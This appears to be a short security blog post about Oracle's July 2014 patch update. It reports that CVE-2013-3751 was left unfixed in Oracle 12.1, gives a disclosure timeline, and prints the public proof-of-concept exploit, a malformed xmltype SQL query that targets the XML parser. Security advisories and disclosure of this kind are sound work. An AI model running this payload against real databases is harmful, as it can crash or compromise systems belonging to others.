Yesterday, Oracle released a new critical patch update (CPU Jul 2014) for July 2014. This CPU contains fixes for 5 database vulnerabilities. The most critical one, CVE-2013-3751, has a base score of 9.0 and affects Oracle 12.1 only. The same issue was already fixed for Oracle 11.2 in July 2013 (CPU Jul 2013).
After a short research on the web (google and twitter, less than 5 minutes) I found an exploit for the CVE-2013-3751.
This vulnerability was found by Nicolas Grégoire: He released an exploit nearly 1 year after the patch was published by Oracle. But it seems that he was not aware that Oracle forgot to fix this issue in Oracle 12.1
Timeline of CVE-2013-3751:
- January 2012: Vulnerability found (fuzzing)
- February 2012: Vulnerability reported to ZDI
- March 2012: Vulnerability contracted $500
- November 2012: Reported to Oracle by ZDI
- July 2013: Patch published by Oracle
- March 2014: Oracle’s Cloud still not patched
- June 2014: Exploit released at INS#14 conference
- July 2014: Patch for Oracle 12.1 published by Oracle
Exploit:
———-
select * from dual where xmltype(q'{<aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
abbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbcccccccccccccccccccccccccccccccccccccccccccccccc
ddddddddddddddddddddddddddddddddddddddddddddddddeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee
ffffffffffffffffffffffffffffffffffffffffffffffffhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhh
iiiiiiiiiiiiiiiiiiiiiiiiii foo="bar[a < b]"/>}') like '0wn3d_again';
———-